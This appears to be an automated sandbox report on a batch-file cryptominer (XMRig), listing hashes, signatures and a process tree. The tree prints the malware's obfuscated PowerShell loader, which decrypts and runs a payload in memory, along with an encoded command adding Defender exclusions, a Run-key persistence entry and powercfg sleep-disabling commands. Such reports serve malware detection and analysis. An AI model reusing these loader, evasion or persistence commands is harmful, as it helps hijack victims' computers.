Analysis
- max time kernel: 599s
- max time network: 574s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 17-05-2022 11:59

Static task: static1
Behavioral task: behavioral1 (Sample: Cleaner.bat; Resource: win7-20220414-en)
Behavioral task: behavioral2 (Sample: Cleaner.bat; Resource: win10v2004-20220414-en)

General
- Target: Cleaner.bat
- Size: 3.1MB
- MD5: b0f63b3801d950a3ce8f27d08d4b413a
- SHA1: 5445683bc8c1bdc716ae84cd59dea91ae814dd19
- SHA256: 0162d08202e23240665087b0dfe32652406b6c0595096bb6666234e829cd6233
- SHA512: 051f9fcba315db5f9cc0dec07c1736f984ef94151b92e7ecc3c6823529f4e55270ff44bd08416a77a9f0eb8c732b679ff0500932d309ab51e645b4db909cfc43
Malware Config
Signatures
XMRig Miner Payload (5 IoCs)
Processes (resource | yara_rule):
  behavioral2/memory/2584-154-0x0000000140000000-0x0000000140803000-memory.dmp | xmrig
  behavioral2/memory/2584-155-0x000000014036DB84-mapping.dmp | xmrig
  behavioral2/memory/2584-157-0x0000000140000000-0x0000000140803000-memory.dmp | xmrig
  behavioral2/memory/2584-158-0x0000000140000000-0x0000000140803000-memory.dmp | xmrig
  behavioral2/memory/2584-160-0x0000000140000000-0x0000000140803000-memory.dmp | xmrig
Blocklisted process makes network request (3 IoCs)
Processes (flow | pid | process):
  11 | 2584 | cmd.exe
  13 | 2584 | cmd.exe
  14 | 2584 | cmd.exe
Executes dropped EXE (1 IoC)
Processes (pid | process):
  664 | Cleaner.bat.exe
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes (description | ioc | process):
  Key value queried | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation | Cleaner.bat.exe
Adds Run key to start application (2 TTPs, 1 IoC)
Processes (description | ioc | process):
  Set value (str) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cleaner.bat = "cmd /c \"C:\\Users\\Admin\\Cleaner.bat\"" | Cleaner.bat.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTP)
Suspicious use of SetThreadContext (1 IoC)
Processes (description | pid | process | target process):
  PID 664 set thread context of 2584 | 664 | Cleaner.bat.exe | cmd.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash (1 IoC)
Processes (pid | pid_target | process | target process):
  5008 | 1524 | WerFault.exe | cmd.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes (pid | process):
  664 | Cleaner.bat.exe (2 entries)
  2296 | powershell.exe (2 entries)
  2584 | cmd.exe (all remaining entries; 64 in total)
Suspicious behavior: LoadsDriver (1 IoC)
Processes (pid | process):
  668 | (no process name recorded)
Suspicious use of AdjustPrivilegeToken (12 IoCs)
Processes (description | pid | process):
  Token: SeDebugPrivilege | 664 | Cleaner.bat.exe
  Token: SeDebugPrivilege | 2296 | powershell.exe
  Token: SeShutdownPrivilege | 2632 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 2632 | powercfg.exe
  Token: SeShutdownPrivilege | 3628 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 3628 | powercfg.exe
  Token: SeShutdownPrivilege | 1920 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 1920 | powercfg.exe
  Token: SeShutdownPrivilege | 2628 | powercfg.exe
  Token: SeCreatePagefilePrivilege | 2628 | powercfg.exe
  Token: SeLockMemoryPrivilege | 2584 | cmd.exe
  Token: SeLockMemoryPrivilege | 2584 | cmd.exe
Suspicious use of WriteProcessMemory (43 IoCs)
Processes (description | pid | process | target process); each write is logged twice unless noted:
  PID 1524 wrote to memory of 1424 | 1524 | cmd.exe | cmd.exe
  PID 1524 wrote to memory of 2704 | 1524 | cmd.exe | xcopy.exe
  PID 1524 wrote to memory of 3120 | 1524 | cmd.exe | attrib.exe
  PID 1524 wrote to memory of 664 | 1524 | cmd.exe | Cleaner.bat.exe
  PID 664 wrote to memory of 4468 | 664 | Cleaner.bat.exe | csc.exe
  PID 4468 wrote to memory of 1936 | 4468 | csc.exe | cvtres.exe
  PID 664 wrote to memory of 2052 | 664 | Cleaner.bat.exe | cmd.exe
  PID 2052 wrote to memory of 2296 | 2052 | cmd.exe | powershell.exe
  PID 664 wrote to memory of 3568 | 664 | Cleaner.bat.exe | cmd.exe
  PID 3568 wrote to memory of 2632 | 3568 | cmd.exe | powercfg.exe
  PID 3568 wrote to memory of 3628 | 3568 | cmd.exe | powercfg.exe
  PID 3568 wrote to memory of 1920 | 3568 | cmd.exe | powercfg.exe
  PID 3568 wrote to memory of 2628 | 3568 | cmd.exe | powercfg.exe
  PID 664 wrote to memory of 2584 | 664 | Cleaner.bat.exe | cmd.exe (15 entries)
  PID 1524 wrote to memory of 220 | 1524 | cmd.exe | attrib.exe
Views/modifies file attributes (1 TTP, 2 IoCs)
Processes (pid | process):
  3120 | attrib.exe
  220 | attrib.exe
Processes (tree; depth shown by indentation, signatures listed under each process)
- C:\Windows\system32\cmd.exe
  command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /S /D /c" echo F"
  - C:\Windows\system32\xcopy.exe
    command line: xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe" /y
  - C:\Windows\system32\attrib.exe
    command line: attrib +s +h "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe"
    - Views/modifies file attributes
  - C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe
    command line: Cleaner.bat.exe -noprofile -windowstyle hidden -executionpolicy bypass -command $cpGMmW = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\Cleaner.bat').Split([Environment]::NewLine);$vKMTac = $cpGMmW[$cpGMmW.Length - 1];$qUeblb = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dXNpbmcgU3lzdGVtLlRleHQ7dXNpbmcgU3lzdGVtLklPO3VzaW5nIFN5c3RlbS5JTy5Db21wcmVzc2lvbjt1c2luZyBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5OyBwdWJsaWMgY2xhc3MgZHlIZHhWIHsgcHVibGljIHN0YXRpYyBieXRlW10gSHVTTFdiKGJ5dGVbXSBpbnB1dCwgYnl0ZVtdIGtleSwgYnl0ZVtdIGl2KSB7IEFlc01hbmFnZWQgYWVzID0gbmV3IEFlc01hbmFnZWQoKTsgYWVzLk1vZGUgPSBDaXBoZXJNb2RlLkNCQzsgYWVzLlBhZGRpbmcgPSBQYWRkaW5nTW9kZS5QS0NTNzsgSUNyeXB0b1RyYW5zZm9ybSBkZWNyeXB0b3IgPSBhZXMuQ3JlYXRlRGVjcnlwdG9yKGtleSwgaXYpOyBieXRlW10gZGVjcnlwdGVkID0gZGVjcnlwdG9yLlRyYW5zZm9ybUZpbmFsQmxvY2soaW5wdXQsIDAsIGlucHV0Lkxlbmd0aCk7IGRlY3J5cHRvci5EaXNwb3NlKCk7IGFlcy5EaXNwb3NlKCk7IHJldHVybiBkZWNyeXB0ZWQ7IH0gcHVibGljIHN0YXRpYyBieXRlW10gRndaYVdtKGJ5dGVbXSBieXRlcykgeyBNZW1vcnlTdHJlYW0gbXNpID0gbmV3IE1lbW9yeVN0cmVhbShieXRlcyk7IE1lbW9yeVN0cmVhbSBtc28gPSBuZXcgTWVtb3J5U3RyZWFtKCk7IHZhciBncyA9IG5ldyBHWmlwU3RyZWFtKG1zaSwgQ29tcHJlc3Npb25Nb2RlLkRlY29tcHJlc3MpOyBncy5Db3B5VG8obXNvKTsgZ3MuRGlzcG9zZSgpOyBtc2kuRGlzcG9zZSgpOyBtc28uRGlzcG9zZSgpOyByZXR1cm4gbXNvLlRvQXJyYXkoKTsgfSB9'));Add-Type -TypeDefinition $qUeblb;[System.Reflection.Assembly]::Load([dyHdxV]::FwZaWm([dyHdxV]::HuSLWb([System.Convert]::FromBase64String($vKMTac), [System.Convert]::FromBase64String('GpALIgw8Bm2Ku/F1LxriAEFFGLwksa0vKKHsogEGbsM='), [System.Convert]::FromBase64String('0GcmDM5eLt1yF271xja3FQ==')))).EntryPoint.Invoke($null, (, [string[]] ('')))
    - Executes dropped EXE
    - Checks computer location settings
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l0syrkse\l0syrkse.cmdline"
      - Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES69BB.tmp" "c:\Users\Admin\AppData\Local\Temp\l0syrkse\CSC43EE0D93142C47878DF09B9DB3B4965.TMP"
    - C:\Windows\System32\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGgAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBtAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB0AGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYwB2AHYAIwA+AA=="
      - Suspicious use of WriteProcessMemory
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: powershell -EncodedCommand "PAAjAGgAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBtAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB0AGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYwB2AHYAIwA+AA=="
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\powercfg.exe
        command line: powercfg /x -hibernate-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\powercfg.exe
        command line: powercfg /x -hibernate-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\powercfg.exe
        command line: powercfg /x -standby-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\powercfg.exe
        command line: powercfg /x -standby-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\cmd.exe
      command line: C:\Windows\System32\cmd.exe drfqmlnvpiibl0 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
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\attrib.exe
    command line: attrib -s -h "C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe"
    - Views/modifies file attributes
  - C:\Windows\system32\WerFault.exe
    command line: C:\Windows\system32\WerFault.exe -u -p 1524 -s 320
    - Program crash
- C:\Windows\system32\WerFault.exe
  command line: C:\Windows\system32\WerFault.exe -pss -s 412 -p 1524 -ip 1524
- C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 62461867e727b7a65c3b85016c812fea
  SHA1: 59a83efb0aea842574a9d804de00cfe174391a0b
  SHA256: 3714a4bf476a340629937c1a92e5cde2cdf9b55d894e9edf356c80f03c58c053
  SHA512: 05b0939c3243730015127f1da97184420ee073de1bf75c91655e3e58218e9bc41fb14fcaecad9912e1b93b3773c506854bd03665648b95e950a491b8814cbb9d
- C:\Users\Admin\AppData\Local\Temp\Cleaner.bat.exe
  Filesize: 442KB
  MD5: 04029e121a0cfa5991749937dd22a1d9
  SHA1: f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
  SHA256: 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
  SHA512: 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
- C:\Users\Admin\AppData\Local\Temp\RES69BB.tmp
  Filesize: 1KB
  MD5: 58f98b066858fd606aada45ee053ea52
  SHA1: 3bb837f076cf7b42c6a489dcf3a139622b221f4c
  SHA256: ad17c98969652c4db10290a5d1d22ddb9f5b4dcc5833844969032d65116d74b6
  SHA512: 4f7a0eba7b34380e5f0421c95a4c8f39205dc8e95355d00b1cfe840b4c5b1384b1c25908d237f1ecc1c98a5505482d3fc8d3783b7b0d44d46daa38e4d2e8a1b7
- C:\Users\Admin\AppData\Local\Temp\l0syrkse\l0syrkse.dll
  Filesize: 3KB
  MD5: 9deffe7af029480723ee2ca9819dad60
  SHA1: 7ee817cd87f9488eb54965241a1cb5ca7cd13042
  SHA256: 64e7339661c5e01f73036dc4ac899f8397ccccaf19011ff8fc874fe08738de55
  SHA512: e5b58d6986b26ab838c0beeaaab305443eaf2f129b2fc8e1d06ec09df6a4acf5136595b3a65bda15cec45369752888e4e5eb9192b6625c22900e2f2707c2397a
- \??\c:\Users\Admin\AppData\Local\Temp\l0syrkse\CSC43EE0D93142C47878DF09B9DB3B4965.TMP
  Filesize: 652B
  MD5: 80242c3cce355974b1d12f73343c9183
  SHA1: 7fdbb996ec7ab37225e3ed42bb69db618787230e
  SHA256: e2fae1ea1aa09f95a1bdde7fbc28703043949e8ad632a52ba6cc579b38036b7a
  SHA512: 1b75745a7959edc1f7a41639ea0ca64de12a5dba8002bc3de638fc38117e1afdde60f5d7b17cb3972c2fa8fa3bebf66acd4086d6081783880a6cf42c63ba4277
- \??\c:\Users\Admin\AppData\Local\Temp\l0syrkse\l0syrkse.0.cs
  Filesize: 744B
  MD5: 7ba109a6ade3811040a994c47678a924
  SHA1: 852d06b7e9d96fcd7ed0de7dca03882044d6684a
  SHA256: 82b5ccd87e34e64a00145fe3a7baaeb2fec10213583a32cf7a0327516fe960e3
  SHA512: f81a5f1899594ab262ee4f57b3f4af58ed991d7db9bc48ec1397f9caa966f53e660e4e35fc0bfadc55ca13850b3727a2fab68ef42d445cd96ee290cfc11f4971
- \??\c:\Users\Admin\AppData\Local\Temp\l0syrkse\l0syrkse.cmdline
  Filesize: 369B
  MD5: 388f2ccc52d8711aa07f8686dc54668e
  SHA1: b14d409cea30888401214f308f33969b9cb48be3
  SHA256: 99575aabc36ec3f7c7dd5a2c774299febebcfc7910aa3d45401d7a8d239c3b10
  SHA512: 675ee28e94a441243b7e41b70662c278c48f06e599863cfdfd7d5ea4117001cd655ba369f12607a626eac49175e4a9a99a261ac7120e110df85b10e161bebca4
- memory/220-161-0x0000000000000000-mapping.dmp
- memory/664-134-0x0000000000000000-mapping.dmp
- memory/664-137-0x00007FF8E7ED0000-0x00007FF8E8991000-memory.dmp (Filesize: 10.8MB)
- memory/664-136-0x000001DE4B2E0000-0x000001DE4B302000-memory.dmp (Filesize: 136KB)
- memory/664-145-0x000001DE634B0000-0x000001DE634C2000-memory.dmp (Filesize: 72KB)
- memory/1424-130-0x0000000000000000-mapping.dmp
- memory/1920-152-0x0000000000000000-mapping.dmp
- memory/1936-141-0x0000000000000000-mapping.dmp
- memory/2052-146-0x0000000000000000-mapping.dmp
- memory/2296-148-0x00007FF8E7ED0000-0x00007FF8E8991000-memory.dmp (Filesize: 10.8MB)
- memory/2296-147-0x0000000000000000-mapping.dmp
- memory/2584-154-0x0000000140000000-0x0000000140803000-memory.dmp (Filesize: 8.0MB)
- memory/2584-164-0x000001C2777F0000-0x000001C277810000-memory.dmp (Filesize: 128KB)
- memory/2584-163-0x000001C2777F0000-0x000001C277810000-memory.dmp (Filesize: 128KB)
- memory/2584-162-0x000001C277380000-0x000001C2773C0000-memory.dmp (Filesize: 256KB)
- memory/2584-155-0x000000014036DB84-mapping.dmp
- memory/2584-165-0x000001C277C20000-0x000001C277C40000-memory.dmp (Filesize: 128KB)
- memory/2584-157-0x0000000140000000-0x0000000140803000-memory.dmp (Filesize: 8.0MB)
- memory/2584-158-0x0000000140000000-0x0000000140803000-memory.dmp (Filesize: 8.0MB)
- memory/2584-159-0x000001C1E4E80000-0x000001C1E4EA0000-memory.dmp (Filesize: 128KB)
- memory/2584-160-0x0000000140000000-0x0000000140803000-memory.dmp (Filesize: 8.0MB)
- memory/2628-153-0x0000000000000000-mapping.dmp
- memory/2632-150-0x0000000000000000-mapping.dmp
- memory/2704-131-0x0000000000000000-mapping.dmp
- memory/3120-132-0x0000000000000000-mapping.dmp
- memory/3568-149-0x0000000000000000-mapping.dmp
- memory/3628-151-0x0000000000000000-mapping.dmp
- memory/4468-138-0x0000000000000000-mapping.dmp